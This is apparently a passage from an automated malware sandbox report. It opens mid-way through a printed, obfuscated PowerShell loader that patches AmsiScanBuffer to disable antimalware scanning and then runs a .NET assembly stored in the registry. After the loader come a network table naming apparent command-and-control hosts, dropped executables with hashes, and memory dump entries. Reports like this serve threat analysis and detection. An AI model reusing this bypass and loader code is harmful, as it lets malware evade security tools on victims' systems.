$AogbLNPGwOT.CreateType();}$JfGoiJMViHWLI=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'Wi'+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+'ve'+[Char](77)+''+'e'+''+'t'+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$wwqSywpIkKhOTW=$JfGoiJMViHWLI.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'P'+''+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+'dd'+'r'+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+''+'S'+'t'+[Char](97)+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$wPdTjXGaJUhEpzmbFvY=AtdggxCIdjhd @([String])([IntPtr]);$YXMKcfjUyXAQJthUbnycgf=AtdggxCIdjhd @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$IVmLKhBkuio=$JfGoiJMViHWLI.GetMethod(''+[Char](71)+'etM'+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+'l')));$aeAacpNSsqJZzp=$wwqSywpIkKhOTW.Invoke($Null,@([Object]$IVmLKhBkuio,[Object](''+'L'+''+'o'+''+[Char](97)+'d'+[Char](76)+'ib'+'r'+''+'a'+''+[Char](114)+'y'+[Char](65)+'')));$ZtAWNcQjOtBSpLTrW=$wwqSywpIkKhOTW.Invoke($Null,@([Object]$IVmLKhBkuio,[Object](''+'V'+'i'+'r'+''+'t'+'ua'+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$AbgNuSk=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aeAacpNSsqJZzp,$wPdTjXGaJUhEpzmbFvY).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$AtahQjknUzseEcvkT=$wwqSywpIkKhOTW.Invoke($Null,@([Object]$AbgNuSk,[Object]('Am'+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+'f'+''+[Char](101)+''+[Char](114)+'')));$qRaJSqIOdk=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZtAWNcQjOtBSpLTrW,$YXMKcfjUyXAQJthUbnycgf).Invoke($AtahQjknUzseEcvkT,[uint32]8,4,[ref]$qRaJSqIOdk);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AtahQjknUzseEcvkT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZtAWNcQjOtBSpLTrW,$YXMKcfjUyXAQJthUbnycgf).Invoke($AtahQjknUzseEcvkT,[uint32]8,0x20,[ref]$qRaJSqIOdk);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+'F'+''+[Char](84)+''+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue(''+[Char](120)+''+'4'+'s'+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{d2180955-611f-4230-a320-e51bdaf1c103}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 172.67.75.40:80 | rentry.co | tcp |
| US | 172.67.75.40:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 40.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | news-accept.gl.at.ply.gg | udp |
| US | 147.185.221.20:24727 | news-accept.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| FR | 162.19.58.158:443 | i.ibb.co | tcp |
| US | 8.8.8.8:53 | 158.58.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wiznon.000webhostapp.com | udp |
| US | 145.14.144.114:443 | wiznon.000webhostapp.com | tcp |
| US | 8.8.8.8:53 | 114.144.14.145.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wiz.bounceme.net | udp |
| US | 65.191.34.109:6000 | wiz.bounceme.net | tcp |
| US | 147.185.221.20:24727 | news-accept.gl.at.ply.gg | tcp |
| US | 65.191.34.109:6000 | wiz.bounceme.net | tcp |
| US | 8.8.8.8:53 | 213.80.50.20.in-addr.arpa | udp |
| US | 147.185.221.20:24727 | news-accept.gl.at.ply.gg | tcp |
| US | 65.191.34.109:6000 | wiz.bounceme.net | tcp |
Files
memory/4800-3-0x00007FFE454A3000-0x00007FFE454A4000-memory.dmp
memory/4800-5-0x000001DA7DC20000-0x000001DA7DC42000-memory.dmp
memory/4800-6-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/4800-7-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/4800-10-0x000001DA7DDE0000-0x000001DA7DE56000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1skdrhqn.tj2.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4800-25-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/4800-30-0x000001DA7E4B0000-0x000001DA7E672000-memory.dmp
C:\Windows\svchost32.exe
| MD5 | de68372979221ee19e301cd657bdb1b6 |
| SHA1 | 4266ce79f32422735a99259c27749b6d7fbe158e |
| SHA256 | 720747405e106709767314b8a58bb754aee0f2bcc568440d757aaab17a181f6a |
| SHA512 | 3c80bf8e5dda4a7fb9837e7098f5682651026ba41396fb18221ba96fa61e22961abc22e60760e719ce5300663ba18877aed60bd2106198eb6bf69030ce4fee16 |
memory/216-46-0x00000000001C0000-0x00000000001F4000-memory.dmp
memory/4800-50-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\x4s.exe
| MD5 | 7d333fbc75b9264d3b631861794a7641 |
| SHA1 | 165e2b6ad994fe9bab44154e3812b2e8825dfa76 |
| SHA256 | b98612934cc154c292502370baca4769f1fccad2c79c17237d23ffd5926180bf |
| SHA512 | 54408249ba56c7c19f41c8d35113f306f0fa62c6f5331993945504d09075977346eb40465107d4fab44159a46bd0048d8ea265d31b57d16294420552353175b3 |
C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
| MD5 | 8a7bee2c8cec6ac50bc42fe03d3231e6 |
| SHA1 | ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d |
| SHA256 | c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8 |
| SHA512 | 34370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5 |
memory/4524-59-0x00000000001B0000-0x00000000001BE000-memory.dmp
memory/4788-86-0x000002BEE6C20000-0x000002BEE6C4A000-memory.dmp
memory/4788-88-0x00007FFE61F00000-0x00007FFE61FAE000-memory.dmp
memory/4788-87-0x00007FFE62310000-0x00007FFE624EB000-memory.dmp
memory/1820-92-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1820-91-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1820-90-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1820-89-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1820-98-0x00007FFE62310000-0x00007FFE624EB000-memory.dmp
memory/1820-99-0x00007FFE61F00000-0x00007FFE61FAE000-memory.dmp
memory/1820-97-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1820-100-0x0000000140000000-0x0000000140008000-memory.dmp
memory/580-103-0x0000029B28E50000-0x0000029B28E76000-memory.dmp
memory/580-104-0x0000029B28E80000-0x0000029B28EAC000-memory.dmp
memory/580-105-0x0000029B28E80000-0x0000029B28EAC000-memory.dmp
memory/580-112-0x00007FFE223A0000-0x00007FFE223B0000-memory.dmp
memory/580-111-0x0000029B28E80000-0x0000029B28EAC000-memory.dmp
memory/640-116-0x0000027B34070000-0x0000027B3409C000-memory.dmp
memory/640-123-0x00007FFE223A0000-0x00007FFE223B0000-memory.dmp
memory/640-122-0x0000027B34070000-0x0000027B3409C000-memory.dmp
memory/744-127-0x0000014ACBEB0000-0x0000014ACBEDC000-memory.dmp
memory/744-134-0x00007FFE223A0000-0x00007FFE223B0000-memory.dmp
memory/744-133-0x0000014ACBEB0000-0x0000014ACBEDC000-memory.dmp
memory/920-145-0x00007FFE223A0000-0x00007FFE223B0000-memory.dmp
memory/920-144-0x0000016AA1F10000-0x0000016AA1F3C000-memory.dmp
memory/920-138-0x0000016AA1F10000-0x0000016AA1F3C000-memory.dmp
memory/1004-149-0x0000025AC2420000-0x0000025AC244C000-memory.dmp
memory/4524-741-0x00000000021D0000-0x00000000021DE000-memory.dmp